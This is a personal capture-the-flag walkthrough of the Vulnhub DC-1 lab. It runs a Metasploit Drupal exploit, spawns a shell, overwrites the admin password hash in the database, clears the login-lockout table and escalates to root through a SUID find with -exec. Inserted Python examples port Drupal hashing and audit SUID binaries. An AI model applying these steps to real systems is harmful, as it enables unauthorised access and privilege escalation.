
Vulnhub DC-1

My first time doing a penetration test. I followed a senior's walkthrough the whole way.

Preparation

Import the target VM and set its network adapter to the same mode as Kali so both sit on the same subnet. There are 5 flags in total.

Penetration

nmap -sP 192.168.9.0/24

Once the target's IP is found, scan its ports:

nmap -p- 192.168.9.130

Ports 22 and 80 are open.

The Wappalyzer plugin identifies the CMS as Drupal 7.

Trying msf:

msfconsole  # start msf
search drupal  # search for Drupal exploit modules
use 1  # select the exploit
show options
set RHOSTS 192.168.9.130  # set the remaining required option
exploit  # run the exploit
shell
python -c 'import pty;pty.spawn("/bin/bash")'  # spawn an interactive shell

This gives the first flag:

Every good CMS needs a config file - and so do you.

The hint points at the config file, so go into the sites directory.

flag2 is in settings.php:

 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?

Right below it are the database credentials, so try connecting to the database:

mysql -udbuser -pR0ck3t

Try changing the admin password in order to log into the backend. First find the hashing logic.

The hashing logic is in password-hash.sh under the scripts folder; run it to generate a replacement hash.

It fails with the following errors:

www-data@DC-1:/var/www/scripts$ ./password-hash.sh "123456"
./password-hash.sh "123456"
PHP Warning:  include_once(/var/www/scripts/includes/password.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/password.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(/var/www/scripts/includes/bootstrap.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 84
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/bootstrap.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 84
PHP Fatal error:  Call to undefined function user_hash_password() in /var/www/scripts/password-hash.sh on line 87

This means password.inc is not under that directory. Either copy the whole includes folder into the scripts directory and run it again, or pass the --root option to point the script at the Drupal root directory:

www-data@DC-1:/var/www/scripts$ ./password-hash.sh --root "/var/www" "123456"
./password-hash.sh --root "/var/www" "123456"

password: 123456                hash: $S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau

Update the database and log into the backend:

update users set pass='$S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau' where name = 'admin';
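The `$S$` string written into the users table above is Drupal 7's own password format: `$S$`, one character encoding log2 of the iteration count, an 8-character salt, then a truncated custom base64 of SHA-512 iterated that many times. The following is an added example, not code from this write-up or from Drupal's password.inc, that ports the scheme to Python so a defender can read the work factor and salt off a stored hash and verify a password against it offline. `PAGE_HASH` is the hash printed by password-hash.sh above; `hash_password`, `check_password` and the other names are this example's own.

```python
"""Drupal 7 password hashing ported to Python.

Added example, not code from the DC-1 box or from Drupal's own password.inc:
it mirrors the $S$ scheme that password-hash.sh produced above, so a defender
can read the work factor and salt out of a stored hash and verify a password
against it offline. Only the standard library is used.
"""
import hashlib
import hmac
import math
import os
from typing import Optional, Tuple

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55             # DRUPAL_HASH_LENGTH: stored hashes are truncated to this
DEFAULT_COUNT_LOG2 = 15      # DRUPAL_HASH_COUNT: 2**15 SHA-512 rounds by default
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30

# The hash password-hash.sh printed for "123456" in the write-up above.
PAGE_HASH = "$S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau"


def password_base64_encode(data: bytes) -> str:
    """phpass-style base64: 6 bits per char, ITOA64 alphabet, no padding."""
    out = []
    i, count = 0, len(data)
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> Tuple[int, str]:
    """Split the 12-char prefix "$S$" + count char + 8-char salt into (rounds, salt)."""
    setting = stored[:12]
    if len(setting) < 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("not a phpass-style setting")
    count_log2 = ITOA64.find(setting[3])       # -1 if the char is not in the alphabet
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        raise ValueError("iteration count outside Drupal's allowed range")
    return 1 << count_log2, setting[4:12]


def password_crypt(algo: str, password: str, setting: str) -> Optional[str]:
    """Port of _password_crypt(): hash(salt+pw), then `rounds` times hash(digest+pw)."""
    if len(password) > 512:                    # Drupal refuses very long inputs
        return None
    try:
        rounds, salt = parse_setting(setting)
    except ValueError:
        return None
    pw = password.encode()
    digest = hashlib.new(algo, salt.encode() + pw).digest()
    for _ in range(rounds):
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting[:12] + password_base64_encode(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)
    return output[:HASH_LENGTH] if len(output) == expected else None


def hash_password(password: str, count_log2: int = DEFAULT_COUNT_LOG2) -> Optional[str]:
    """Port of user_hash_password(): fresh 6-byte random salt, then password_crypt."""
    count_log2 = min(max(count_log2, MIN_COUNT_LOG2), MAX_COUNT_LOG2)
    setting = "$S$" + ITOA64[count_log2] + password_base64_encode(os.urandom(6))
    return password_crypt("sha512", password, setting)


def check_password(password: str, stored: str) -> bool:
    """Port of user_check_password() for $S$ (D7) and $P$/$H$ (phpass md5) hashes."""
    if stored.startswith("U$"):                # D6 md5 hash re-wrapped during upgrade
        stored = stored[1:]
        password = hashlib.md5(password.encode()).hexdigest()
    kind = stored[:3]
    if kind == "$S$":
        computed = password_crypt("sha512", password, stored)
    elif kind in ("$P$", "$H$"):
        computed = password_crypt("md5", password, stored)
    else:
        return False
    # Drupal compares with ==; a constant-time compare is the safer habit.
    return computed is not None and hmac.compare_digest(computed.encode(), stored.encode())


if __name__ == "__main__":
    rounds, salt = parse_setting(PAGE_HASH)
    print(f"page hash: {rounds} SHA-512 rounds, salt {salt!r}")
    print("page hash matches '123456':", check_password("123456", PAGE_HASH))
    fresh = hash_password("correct horse", count_log2=10)
    print("round trip:", check_password("correct horse", fresh))
```

Reading the count character is the useful defensive part: `D` in the page's hash is index 15 in the alphabet, so every login costs 32768 SHA-512 rounds, and a stored hash whose count character is below `5` (index 7) or malformed is rejected outright by `parse_setting`, exactly as Drupal would refuse it.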

Because I had blindly tried more than 5 times earlier, the IP gets locked for a while; running truncate flood in the database lets you try again.

flag3 is under Content in the backend:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

The hint says to look at the shadow file, which requires privilege escalation.

Privilege escalation

find / -perm -4000 2>/dev/null

List the programs with the SUID bit. find has SUID set, so use find to escalate:

touch tourist
find / -name tourist -exec "/bin/sh" \;
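Seen from the defender's side, the finding above is a setuid binary that has no business being setuid. The following is an added example, not code from this write-up: it walks a directory tree, lists setuid regular files, and flags any that are not on a baseline allowlist. The allowlist and the temp-directory fixture are constructed for illustration; a real baseline should come from the package manager or a clean image of the same build.

```python
"""Audit setuid binaries against a baseline.

Added example, not part of the DC-1 write-up: the write-up spots the weak
point with `find / -perm -4000`; this is the same check from the defender's
side, walking a tree and flagging setuid files that are not on a known-good
list. DEFAULT_ALLOWLIST is a constructed, illustrative baseline.
"""
import os
import stat
import tempfile
from typing import Iterable, List, Set

DEFAULT_ALLOWLIST: Set[str] = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/newgrp",
}


def find_suid(root: str) -> List[str]:
    """Regular files under root with the setuid bit set (symlinks are not followed)."""
    found = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue            # file vanished or is unreadable; keep auditing
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_suid(paths: Iterable[str], allowlist: Set[str] = DEFAULT_ALLOWLIST) -> List[str]:
    """Setuid paths that are not in the baseline; DC-1's setuid find would land here."""
    return sorted(p for p in paths if p not in allowlist)


def suid_bit_held(path: str) -> bool:
    """True if the filesystem actually kept the setuid bit on path."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def build_demo_tree() -> str:
    """Constructed fixture: a temp dir with one plain file and one setuid file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for name, mode in (("plain", 0o755), ("find", 0o4755)):
        path = os.path.join(root, name)
        with open(path, "w"):
            pass
        try:
            os.chmod(path, mode)
        except OSError:
            pass                    # some sandboxes refuse; suid_bit_held() reports it
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    hits = find_suid(root)
    print("setuid files:", hits)
    print("not on baseline:", unexpected_suid(hits))
    # On a real host: unexpected_suid(find_suid("/"))
```

Running `unexpected_suid(find_suid("/"))` on a schedule and alerting on any non-empty result is the cheap control this box lacks; on DC-1 the only line it would print is the setuid copy of find.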

flag5 is in the root directory:

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

As for flag4: /etc/passwd shows a flag4 user, and flag4 is in that user's home directory:

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?
posted @ 2025-01-17 17:38 by 场-room